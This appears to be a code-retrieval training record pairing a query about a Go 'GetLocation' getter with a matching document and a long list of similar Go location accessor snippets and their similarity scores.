[ "0.59298825", "0.56376743", "0.5580803", "0.5503781", "0.54797757", "0.54481167", "0.54247004", "0.53521115", "0.5325494", "0.53130186", "0.5279733", "0.52649295", "0.52334094", "0.51875293", "0.51772195", "0.5161802", "0.5146233", "0.5131163", "0.51252997", "0.50984263", "0.5069016", "0.5060735", "0.50560135", "0.5039155", "0.50155175", "0.5006957", "0.4998593", "0.49863002", "0.4976758", "0.4943173", "0.49346572", "0.49220204", "0.4877274", "0.4852173", "0.48306838", "0.48283526", "0.47958854", "0.47835696", "0.47774887", "0.4759583", "0.47562242", "0.4727659", "0.47221303", "0.47213897", "0.47089428", "0.47065526", "0.46568668", "0.4640598", "0.46191448", "0.4615456", "0.46149254", "0.46123707", "0.45745867", "0.45733458", "0.45705616", "0.45697424", "0.45650625", "0.4555443", "0.4550897", "0.4545114", "0.45291018", "0.45245034", "0.45137626", "0.4509843", "0.45003125", "0.44922552", "0.44699025", "0.4453827", "0.4421227", "0.44143814", "0.44141248", "0.44076568", "0.44005337", "0.43962908", "0.43867475", "0.43866554", "0.4372503", "0.43663362", "0.43385023", "0.43353525", "0.43076736", "0.43003306", "0.42720374", "0.42712358", "0.42706347", "0.42685047", "0.42624104", "0.42618245", "0.42618245", "0.42544293", "0.42455664", "0.4229334", "0.42267102", "0.42220464", "0.4217683", "0.4215423", "0.42093673", "0.4202311", "0.41974175", "0.4189609" ]
0.78977525
0
GetLocation returns the Location field value if set, zero value otherwise.
func (o *CloudAwsVirtualMachineAllOf) GetLocation() CloudAwsVpcRelationship { if o == nil || o.Location == nil { var ret CloudAwsVpcRelationship return ret } return *o.Location }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *NewData) GetLocation() Location {\n\tif o == nil || o.Location == nil {\n\t\tvar ret Location\n\t\treturn ret\n\t}\n\treturn *o.Location\n}", "func (u *User) GetLocation() string {\n\tif u == nil || u.Location == nil {\n\t\treturn \"\"\n\t}\n\treturn *u.Location\n}", "func (s *SessionData) GetLocation() *time.Location {\n\tif s == nil || s.Location == nil {\n\t\treturn time.UTC\n\t}\n\treturn s.Location\n}", "func (o *SyntheticsTriggerCITestRunResult) GetLocation() int64 {\n\tif o == nil || o.Location == nil {\n\t\tvar ret int64\n\t\treturn ret\n\t}\n\treturn *o.Location\n}", "func (o *BaseReportTransaction) GetLocation() Location {\n\tif o == nil || o.Location == nil {\n\t\tvar ret Location\n\t\treturn ret\n\t}\n\treturn *o.Location\n}", "func (o *Organization) GetLocation() string {\n\tif o == nil || o.Location == nil {\n\t\treturn \"\"\n\t}\n\treturn *o.Location\n}", "func (o *Transaction) GetLocation() Location {\n\tif o == nil {\n\t\tvar ret Location\n\t\treturn ret\n\t}\n\n\treturn o.Location\n}", "func (t *touch) GetLocation() Point {\n\treturn &point{t.Call(\"getLocation\")}\n}", "func (address *Address) GetLocation() *Location {\n\n // Just return a dummy for STUB\n\n return &Location{0,0}\n}", "func (o *SessionDevice) GetLocation() string {\n\tif o == nil || o.Location == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Location\n}", "func (i *InputInlineQueryResultLocation) GetLocation() (value Location) {\n\tif i == nil {\n\t\treturn\n\t}\n\treturn i.Location\n}", "func (u *User) GetLocation(tx *pop.Connection) (*Location, error) {\n\tif !u.LocationID.Valid {\n\t\treturn nil, nil\n\t}\n\tlocation := Location{}\n\tif err := tx.Find(&location, u.LocationID); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &location, nil\n}", "func (c *ClockHand) GetLocation() int64 {\n\treturn c.Stepper.GetStep()\n}", "func (az *Cloud) GetLocation() string {\n\treturn az.Location\n}", "func (p Provider) GetLocation() *time.Location {\n\tlocation, _ := time.LoadLocation(\"UTC\")\n\treturn location\n}", "func (o *NewData) GetLocationOk() (*Location, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}", "func (l *Location) GetLocation() string {\n\tchkParsed(l)\n\treturn l.host + \"/\" + l.group + \"/\" + l.name + \":\" + l.version\n}", "func (l Location) GetLocation() (r Location, err error) {\n\tclient := &http.Client{}\n\treqAdd := fmt.Sprintf(\"https://maps.googleapis.com/maps/api/geocode/json?key=%s&address=%s\", os.Getenv(\"GOOGLE_API_KEY\"), strings.Replace(l.PostCode, \" \", \"%20\", -1))\n\treq, err := http.NewRequest(\"GET\", reqAdd, nil)\n\tif err != nil {\n\t\tfmt.Printf(\"Request: %v\", err)\n\t\treturn r, err\n\t}\n\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\tfmt.Printf(\"Do: %v\", err)\n\t\treturn r, err\n\t}\n\n\tbody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tfmt.Printf(\"Body: %v\", err)\n\t\treturn r, err\n\t}\n\n\tj := GoogleResponse{}\n\terr = json.Unmarshal(body, &j)\n\tif err != nil {\n\t\tfmt.Printf(\"Unmarshal: %v\", err)\n\t\treturn r, err\n\t}\n\n\tif len(j.Results) >= 1 {\n\t\tr := Location{\n\t\t\tPostCode: l.PostCode,\n\t\t\tLongitude: j.Results[0].Geometry.Location.Longitude,\n\t\t\tLatitude: j.Results[0].Geometry.Location.Latitude,\n\t\t\tStreet: j.Results[0].AddressComponents[1].ShortName,\n\t\t}\n\t\treturn r, nil\n\t}\n\n\treturn r, errors.New(\"invalid postcode\")\n}", "func (o *Transaction) GetLocationOk() (*Location, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Location, true\n}", "func (o *BaseReportTransaction) GetLocationOk() (*Location, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}", "func (l *GitLocation) GetLocation() *tmv1beta1.TestLocation {\n\treturn l.Info\n}", "func (r Virtual_Guest) GetLocation() (resp datatypes.Location, err error) {\n\terr = r.Session.DoRequest(\"SoftLayer_Virtual_Guest\", \"getLocation\", nil, &r.Options, &resp)\n\treturn\n}", "func (sys *System) GetLocation(ctx *Context, name string) (*Location, error) {\n\treturn sys.findLocation(ctx, name, false)\n}", "func LocationGet(l int) Location {\n\ti := Locationmap[l]\n\treturn i\n}", "func (o WebTestGeolocationOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v WebTestGeolocation) *string { return v.Location }).(pulumi.StringPtrOutput)\n}", "func (c *ConfigurationFile) GetLocation() Location {\n\treturn c.location\n}", "func (c *ACSKCluster) GetLocation() string {\n\treturn c.modelCluster.Location\n}", "func (s *Server) GetLocation(ctx context.Context, req *pb.GetLocationRequest) (*pb.GetLocationResponse, error) {\n\treturn &pb.GetLocationResponse{}, fmt.Errorf(\"Not implemented\")\n}", "func (o *SessionDevice) GetLocationOk() (*string, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}", "func (config *CrocConfig) GetLocation(locationID int) (Location, error) {\n\tvar location Location\n\tendpoint := fmt.Sprintf(\"locations/%d\", locationID)\n\n\tlbytes, err := config.queryPanelAPI(endpoint, \"get\", nil)\n\tif err != nil {\n\t\treturn location, err\n\t}\n\n\t// Get node info from the panel\n\t// Unmarshal the bytes to a usable struct.\n\terr = json.Unmarshal(lbytes, &location)\n\tif err != nil {\n\t\treturn location, err\n\t}\n\n\treturn location, nil\n}", "func (m *ScheduleItem) GetLocation()(*string) {\n val, err := m.GetBackingStore().Get(\"location\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*string)\n }\n return nil\n}", "func (o WebTestGeolocationResponseOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v WebTestGeolocationResponse) *string { return v.Location }).(pulumi.StringPtrOutput)\n}", "func (o *SyntheticsTriggerCITestRunResult) GetLocationOk() (*int64, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}", "func GetLocation(ctx context.Context, partnerID, locationName string, endpointID gocql.UUID) (location *time.Location, err error) {\n\tif len(locationName) > 0 {\n\t\treturn time.LoadLocation(locationName)\n\t}\n\n\treturn asset.ServiceInstance.GetLocationByEndpointID(ctx, partnerID, endpointID)\n}", "func (m *LocationManager) GetLocation(ctx context.Context, locationID int) (*Location, error) {\n\t// Magic numbers here are sourced from:\n\t// - http://eveonline-third-party-documentation.readthedocs.io/en/latest/xmlapi/character/char_assetlist.html\n\t// - https://oldforums.eveonline.com/?a=topic&threadID=667487\n\tconst offsetOfficeIDToStationID = 6000001\n\tconst legacyOutpostStart = 60014861\n\tconst legacyOutpostEndInclusive = 60014928\n\tloc := &Location{}\n\tvar corpID int\n\tif c, ok := authContextFromContext(ctx); ok {\n\t\tcorpID = c.CorporationID()\n\t}\n\tvar err error\n\tswitch {\n\tcase locationID < 60000000:\n\t\t// locationID is a SystemID.\n\t\tloc.System, err = m.evedb.GetSystem(locationID)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\tcase locationID < 61000000:\n\t\t// locationID is a Station or legacy outpost.\n\t\tif locationID >= legacyOutpostStart && locationID <= legacyOutpostEndInclusive {\n\t\t\t// Conquerable outpost pre-dating player outposts. Not yet supported.\n\t\t\treturn nil, errors.Errorf(\"unable to determine details for locationID %d, conquerable outposts are not supported\", locationID)\n\t\t}\n\t\t// Not a legacy outpost, must be a station.\n\t\tloc.Station, err = m.evedb.GetStation(locationID)\n\n\tcase locationID < 66000000:\n\t\t// locationID is a conquerable outpost. Not yet supported.\n\t\treturn nil, errors.Errorf(\"unable to determine details for locationID %d, conquerable outposts are not supported\", locationID)\n\n\tcase locationID < 67000000:\n\t\t// locationID is a rented office.\n\t\tloc.Station, err = m.evedb.GetStation(locationID - offsetOfficeIDToStationID)\n\n\tdefault:\n\t\t// locationID might be a citadel.\n\t\ts, err := m.structure.GetStructure(ctx, locationID)\n\t\tif err == nil {\n\t\t\tloc.Structure = s\n\t\t\tbreak\n\t\t}\n\t\t// locationID is in a container somewhere.\n\t\tif corpID != 0 {\n\t\t\t// Corporation is opted-in, we can query for asset information.\n\t\t\tif ca, err := m.asset.GetCorporationAsset(ctx, corpID, locationID); err == nil {\n\t\t\t\t// Found an asset with the given locationID, call GetLocation on the asset's location.\n\t\t\t\tif loc, err = m.GetLocation(ctx, ca.LocationID); err != nil {\n\t\t\t\t\treturn nil, errors.Wrapf(err, \"unable to determine details for locationID %d\", locationID)\n\t\t\t\t}\n\t\t\t\tbreak\n\t\t\t} else if err != ErrCorpNotRegistered {\n\t\t\t\treturn nil, errors.Wrapf(err, \"unable to determine details for locationID %d\", locationID)\n\t\t\t}\n\t\t}\n\n\t}\n\n\t// Second round of resolution; ensure that loc.System gets populated.\n\tswitch {\n\tcase loc.System != nil:\n\t\t// do nothing\n\n\tcase loc.Structure != nil:\n\t\tif loc.System, err = m.evedb.GetSystem(int(loc.Structure.SystemID)); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\tcase loc.Station != nil:\n\t\tif loc.System, err = m.evedb.GetSystem(loc.Station.SystemID); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\tdefault:\n\t\treturn nil, errors.Errorf(\"unable to determine details for locationID %d\", locationID)\n\t}\n\n\t// Finally, populate the Constellation and Region information.\n\tif loc.Constellation, err = m.evedb.GetConstellation(loc.System.ConstellationID); err != nil {\n\t\treturn nil, err\n\t}\n\tif loc.Region, err = m.evedb.GetRegion(loc.System.RegionID); err != nil {\n\t\treturn nil, err\n\t}\n\tloc.LocationID = locationID\n\treturn loc, nil\n}", "func (p *Player) Location() *Location {\n\treturn p.loc\n}", "func (t *traceLocation) Get() interface{} {\n\treturn nil\n}", "func (m *PrintConnector) GetLocation()(PrinterLocationable) {\n val, err := m.GetBackingStore().Get(\"location\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(PrinterLocationable)\n }\n return nil\n}", "func (o *V1VirusDatasetRequest) GetGeoLocation() string {\n\tif o == nil || o.GeoLocation == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.GeoLocation\n}", "func (a *APIv1) GetLocation(id interface{}, qo *odata.QueryOptions, path string) (*entities.Location, error) {\n\t_, err := a.QueryOptionsSupported(qo, &entities.Location{})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tl, err := a.db.GetLocation(id, qo)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ta.ProcessGetRequest(l, qo)\n\treturn l, nil\n}", "func Location() string {\n\treturn locationDefault\n}", "func (m *ServicePrincipalRiskDetection) GetLocation()(SignInLocationable) {\n val, err := m.GetBackingStore().Get(\"location\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(SignInLocationable)\n }\n return nil\n}", "func (s *InventoryApiService) GetLocation(id string, w http.ResponseWriter) error {\n\tctx := context.Background()\n\tr, err := s.db.GetLocation(ctx, id)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn EncodeJSONResponse(r, nil, w)\n}", "func (p Meta) Location() string { return p.location }", "func (m *PrinterLocation) GetLongitude()(*float64) {\n val, err := m.GetBackingStore().Get(\"longitude\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*float64)\n }\n return nil\n}", "func (r *Rook) Location() location.Location {\n\treturn r.loc\n}", "func (b Bucket) GetLocation(args ...Params) (string, error) {\n\theader, query := getHeaderQuery(args)\n\tquery.Set(\"location\", \"\")\n\tvar location string\n\terr := b.Do(\"GET\", \"\", nil, &location, header, query)\n\treturn location, err\n}", "func (body Body) Loc() *Location {\n\treturn body[0].Location\n}", "func (term *Term) Loc() *Location {\n\tif term == nil {\n\t\treturn nil\n\t}\n\treturn term.Location\n}", "func Location() *time.Location {\n\treturn loc\n}", "func (b *OGame) Location() *time.Location {\n\treturn b.location\n}", "func (m NoMDEntries) GetLocationID() (v string, err quickfix.MessageRejectError) {\n\tvar f field.LocationIDField\n\tif err = m.Get(&f); err == nil {\n\t\tv = f.Value()\n\t}\n\treturn\n}", "func (ls *LocationService) Get(locID string) (l Location, err error) {\n\t// GET: /location/:locationID\n\tvar req *http.Request\n\treq, err = ls.c.NewRequest(\"GET\", \"/location/\"+locID, nil)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tresp := struct {\n\t\tStatus string\n\t\tData Location\n\t\tMessage string\n\t}{}\n\terr = ls.c.Do(req, &resp)\n\treturn resp.Data, err\n}", "func (lc LocationController) GetLocation(w http.ResponseWriter, r *http.Request, p httprouter.Params) {\n\t// Grab id\n\tid := p.ByName(\"id\")\n\n\t// Verify id is ObjectId, otherwise bail\n\tif !bson.IsObjectIdHex(id) {\n\t\tw.WriteHeader(404)\n\t\treturn\n\t}\n\n\t// Grab id\n\toid := bson.ObjectIdHex(id)\n\n\t// Stub Location\n\tvar locationObject Location\n\n\t// Fetch user\n\tif err := lc.session.DB(\"go_rest_api_assignment2\").C(\"locations\").FindId(oid).One(&locationObject); err != nil {\n\t\tw.WriteHeader(404)\n\t\treturn\n\t}\n\n\t// Marshal provided interface into JSON structure\n\tuj, _ := json.Marshal(locationObject)\n\n\t// Write content-type, statuscode, payload\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(200)\n\tfmt.Fprintf(w, \"%s\", uj)\n}", "func (o GetServiceAdditionalLocationOutput) Location() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GetServiceAdditionalLocation) string { return v.Location }).(pulumi.StringOutput)\n}", "func (rule *Rule) Loc() *Location {\n\treturn rule.Location\n}", "func (c *TensorboardClient) GetLocation(ctx context.Context, req *locationpb.GetLocationRequest, opts ...gax.CallOption) (*locationpb.Location, error) {\n\treturn c.internalClient.GetLocation(ctx, req, opts...)\n}", "func (el *gameStruct) Location() dir.Location {\n\treturn el.location\n}", "func (xt XSDTime) Location() *time.Location {\n\tif xt.hasTz {\n\t\treturn xt.innerTime.Location()\n\t}\n\treturn nil\n}", "func (o *Workloadv1Location) GetLongitude() float64 {\n\tif o == nil || o.Longitude == nil {\n\t\tvar ret float64\n\t\treturn ret\n\t}\n\treturn *o.Longitude\n}", "func GetTimeLocation(v *viper.Viper) (timeLoc *time.Location, err error) {\n\tlocationId := v.GetString(TimeLocationKey)\n\n\t// Load time zone location\n\ttimeLoc, err = time.LoadLocation(locationId)\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"Unable to load time zone location defined in configuration [%s]: [%s]\", TimeLocationKey, locationId)\n\t}\n\n\treturn timeLoc, nil\n}", "func (o *CloudAwsVirtualMachineAllOf) GetLocationOk() (*CloudAwsVpcRelationship, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}", "func (m *CarserviceMutation) Location() (r string, exists bool) {\n\tv := m.location\n\tif v == nil {\n\t\treturn\n\t}\n\treturn *v, true\n}", "func (m *PrinterLocation) GetLatitude()(*float64) {\n val, err := m.GetBackingStore().Get(\"latitude\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*float64)\n }\n return nil\n}", "func (m *Reminder) GetEventLocation()(Locationable) {\n val, err := m.GetBackingStore().Get(\"eventLocation\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(Locationable)\n }\n return nil\n}", "func (o *V1VirusDatasetRequest) GetGeoLocationOk() (*string, bool) {\n\tif o == nil || o.GeoLocation == nil {\n\t\treturn nil, false\n\t}\n\treturn o.GeoLocation, true\n}", "func (s Starbase) Location() (int, int) {\n\treturn s.X, s.Y\n}", "func (v Video) GetLocation() (string, bool) {\n\tif v.Path != \"\" {\n\t\treturn fmt.Sprintf(\"%v/%v\", v.Path, storage.MasterPlaylistName), false\n\t}\n\treturn v.RemotePath, true\n}", "func (o *StorageSpaceAllOf) GetLbaLocation() string {\n\tif o == nil || o.LbaLocation == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.LbaLocation\n}", "func (c *CloudSchedulerClient) GetLocation(ctx context.Context, req *locationpb.GetLocationRequest, opts ...gax.CallOption) (*locationpb.Location, error) {\n\treturn c.internalClient.GetLocation(ctx, req, opts...)\n}", "func (o LookupOrchestratedVirtualMachineScaleSetResultOutput) Location() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupOrchestratedVirtualMachineScaleSetResult) string { return v.Location }).(pulumi.StringOutput)\n}", "func (t *touch) GetLocationY() float64 {\n\treturn t.Call(\"getLocationY\").Float()\n}", "func (c *Client) Location(ip string) (*Location, error) {\n\tbody, err := c.getbody(\"geo\", ip)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tl := &Location{}\n\tif err := json.Unmarshal(body, l); err != nil {\n\t\treturn nil, err\n\t}\n\treturn l, nil\n}", "func (j *Job) Location() string {\n\treturn j.location\n}", "func (o *Workloadv1Location) GetLatitude() float64 {\n\tif o == nil || o.Latitude == nil {\n\t\tvar ret float64\n\t\treturn ret\n\t}\n\treturn *o.Latitude\n}", "func (o RegistryGeoreplicationOutput) Location() pulumi.StringOutput {\n\treturn o.ApplyT(func(v RegistryGeoreplication) string { return v.Location }).(pulumi.StringOutput)\n}", "func (o AccessLevelCustomExprPtrOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *AccessLevelCustomExpr) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Location\n\t}).(pulumi.StringPtrOutput)\n}", "func (p *Pawn) Location() location.Location {\n\treturn p.loc\n}", "func GetLocation(timeZone string) *time.Location {\n\t_, logger := GetLogger(nil)\n\tif timeZone == \"\" {\n\t\treturn time.UTC\n\t}\n\tkey := locationKey(timeZone)\n\n\t//probe the cache\n\tloc, ok := locationCache[key]\n\tif ok {\n\t\treturn loc\n\t}\n\n\t//load the location\n\tloc, err := time.LoadLocation(timeZone)\n\tif err != nil {\n\t\tlogger.Warnw(\"invalid location\", \"location\", timeZone)\n\t\treturn time.UTC\n\t}\n\n\t//cache the location\n\tlocationCache[key] = loc\n\treturn loc\n}", "func (s *LocationsOp) Get(ctx context.Context, locationID int) (*Location, *http.Response, error) {\n\tpath := fmt.Sprintf(\"%s/%d\", locationsPath, locationID)\n\n\treq, err := s.client.NewRequest(ctx, http.MethodGet, path, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tlocation := new(Location)\n\tresp, err := s.client.Do(ctx, req, location)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn location, resp, err\n}", "func (m *User) GetOfficeLocation()(*string) {\n return m.officeLocation\n}", "func (o *StorageSpaceAllOf) GetLbaLocationOk() (*string, bool) {\n\tif o == nil || o.LbaLocation == nil {\n\t\treturn nil, false\n\t}\n\treturn o.LbaLocation, true\n}", "func (i *Resource) Location() string {\n\treturn i.data.Location\n}", "func (o GatewayOutput) Location() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *Gateway) pulumi.StringOutput { return v.Location }).(pulumi.StringOutput)\n}", "func (r *Repository) Location() borges.Location {\n\treturn r.location\n}", "func (c *WorkflowsServiceV2BetaClient) GetLocation(ctx context.Context, req *locationpb.GetLocationRequest, opts ...gax.CallOption) (*locationpb.Location, error) {\n\treturn c.internalClient.GetLocation(ctx, req, opts...)\n}", "func (o AccessLevelsAccessLevelCustomExprPtrOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *AccessLevelsAccessLevelCustomExpr) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Location\n\t}).(pulumi.StringPtrOutput)\n}", "func (pkg *Package) Loc() *Location {\n\treturn pkg.Location\n}", "func (o ServiceAdditionalLocationOutput) Location() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ServiceAdditionalLocation) string { return v.Location }).(pulumi.StringOutput)\n}", "func (o LookupNetworkDataNetworkResultOutput) Location() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupNetworkDataNetworkResult) string { return v.Location }).(pulumi.StringOutput)\n}", "func (o PartnerRegionInfoResponseOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v PartnerRegionInfoResponse) *string { return v.Location }).(pulumi.StringPtrOutput)\n}", "func (o LookupNetworkAttachedDataNetworkResultOutput) Location() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupNetworkAttachedDataNetworkResult) string { return v.Location }).(pulumi.StringOutput)\n}", "func (t Time) Location() *Location {}", "func (o ExprPtrOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Expr) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Location\n\t}).(pulumi.StringPtrOutput)\n}", "func (o ExprPtrOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Expr) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Location\n\t}).(pulumi.StringPtrOutput)\n}", "func (o ExprPtrOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Expr) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Location\n\t}).(pulumi.StringPtrOutput)\n}", "func (o ExprPtrOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Expr) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Location\n\t}).(pulumi.StringPtrOutput)\n}", "func (o ExprPtrOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Expr) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Location\n\t}).(pulumi.StringPtrOutput)\n}", "func (o ExprPtrOutput) Location() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Expr) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.Location\n\t}).(pulumi.StringPtrOutput)\n}", "func (o WorkstationIamBindingOutput) Location() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *WorkstationIamBinding) pulumi.StringOutput { return v.Location }).(pulumi.StringOutput)\n}" ]
[ "0.75914586", "0.74932855", "0.74432373", "0.7314789", "0.72736543", "0.7234717", "0.7227698", "0.7219012", "0.7215775", "0.72002393", "0.7192666", "0.7089701", "0.7040621", "0.6980892", "0.69753546", "0.6915969", "0.6901735", "0.68321663", "0.68261355", "0.68069154", "0.6773011", "0.6725238", "0.66769755", "0.66622823", "0.6656093", "0.66445714", "0.66099244", "0.6571919", "0.6564854", "0.65365124", "0.6520609", "0.6507501", "0.6472008", "0.64625543", "0.64551353", "0.6391465", "0.6372533", "0.63374996", "0.63328993", "0.63291544", "0.6325152", "0.63180184", "0.6285568", "0.62772447", "0.62725604", "0.6262145", "0.6256954", "0.62176627", "0.6179377", "0.61761284", "0.61741036", "0.61708736", "0.61694", "0.6168487", "0.6166057", "0.6163921", "0.61525", "0.6148859", "0.6137212", "0.6112621", "0.61112016", "0.6111119", "0.60868585", "0.6076912", "0.6059589", "0.6046588", "0.60429907", "0.6027474", "0.6026673", "0.6025664", "0.60008574", "0.59907067", "0.5973562", "0.5966242", "0.5959622", "0.595918", "0.5957174", "0.5953969", "0.5949686", "0.59399426", "0.5910437", "0.5899394", "0.5892361", "0.5888098", "0.5881477", "0.5880444", "0.58767277", "0.5862566", "0.5860052", "0.5850719", "0.58453375", "0.5842062", "0.58350354", "0.5834681", "0.5834681", "0.5834681", "0.5834681", "0.5834681", "0.5834681", "0.58181083" ]
0.66332537
26
GetLocationOk returns a tuple with the Location field value if set, nil otherwise and a boolean to check if the value has been set.
func (o *CloudAwsVirtualMachineAllOf) GetLocationOk() (*CloudAwsVpcRelationship, bool) { if o == nil || o.Location == nil { return nil, false } return o.Location, true }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *NewData) GetLocationOk() (*Location, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}", "func (o *SessionDevice) GetLocationOk() (*string, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}", "func (o *Transaction) GetLocationOk() (*Location, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Location, true\n}", "func (o *BaseReportTransaction) GetLocationOk() (*Location, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}", "func (o *SyntheticsTriggerCITestRunResult) GetLocationOk() (*int64, bool) {\n\tif o == nil || o.Location == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Location, true\n}", "func (o *V1VirusDatasetRequest) GetGeoLocationOk() (*string, bool) {\n\tif o == nil || o.GeoLocation == nil {\n\t\treturn nil, false\n\t}\n\treturn o.GeoLocation, true\n}", "func (o *User) GetOfficeLocationOk() (string, bool) {\n\tif o == nil || o.OfficeLocation == nil {\n\t\tvar ret string\n\t\treturn ret, false\n\t}\n\treturn *o.OfficeLocation, true\n}", "func (o *StorageSpaceAllOf) GetLbaLocationOk() (*string, bool) {\n\tif o == nil || o.LbaLocation == nil {\n\t\treturn nil, false\n\t}\n\treturn o.LbaLocation, true\n}", "func (o *User) GetProfileLocationOk() (*string, bool) {\n\tif o == nil || o.ProfileLocation == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ProfileLocation, true\n}", "func (o *UcsdBackupInfoAllOf) GetBackupLocationOk() (*string, bool) {\n\tif o == nil || o.BackupLocation == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BackupLocation, true\n}", "func (o *FirmwareHttpServer) GetLocationLinkOk() (*string, bool) {\n\tif o == nil || o.LocationLink == nil {\n\t\treturn nil, false\n\t}\n\treturn o.LocationLink, true\n}", "func (o *SyntheticMonitorUpdate) GetLocationsOk() (*[]string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Locations, true\n}", "func (o *SyntheticsBrowserTest) GetLocationsOk() (*[]string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.Locations, true\n}", "func (o *User) GetUsageLocationOk() (string, bool) {\n\tif o == nil || o.UsageLocation == nil {\n\t\tvar ret string\n\t\treturn ret, false\n\t}\n\treturn *o.UsageLocation, true\n}", "func (o *MicrosoftGraphEducationUser) GetOfficeLocationOk() (string, bool) {\n\tif o == nil || o.OfficeLocation == nil {\n\t\tvar ret string\n\t\treturn ret, false\n\t}\n\treturn *o.OfficeLocation, true\n}", "func (o *SyntheticsPrivateLocationCreationResponse) GetPrivateLocationOk() (*SyntheticsPrivateLocation, bool) {\n\tif o == nil || o.PrivateLocation == nil {\n\t\treturn nil, false\n\t}\n\treturn o.PrivateLocation, true\n}", "func (o *Workloadv1Location) GetLatitudeOk() (*float64, bool) {\n\tif o == nil || o.Latitude == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Latitude, true\n}", "func (o *Hdd) GetControllerLocationOk() (*float32, bool) {\n\tif o == nil || o.ControllerLocation == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ControllerLocation, true\n}", "func (o *Workloadv1Location) GetLongitudeOk() (*float64, bool) {\n\tif o == nil || o.Longitude == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Longitude, true\n}", "func (o *NewData) HasLocation() bool {\n\tif o != nil && o.Location != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *MicrosoftGraphEducationUser) GetUsageLocationOk() (string, bool) {\n\tif o == nil || o.UsageLocation == nil {\n\t\tvar ret string\n\t\treturn ret, false\n\t}\n\treturn *o.UsageLocation, true\n}", "func (o *TagModelStore) GetLongitudeOk() (*float64, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Longitude.Get(), o.Longitude.IsSet()\n}", "func (o *SyntheticsTriggerCITestRunResult) HasLocation() bool 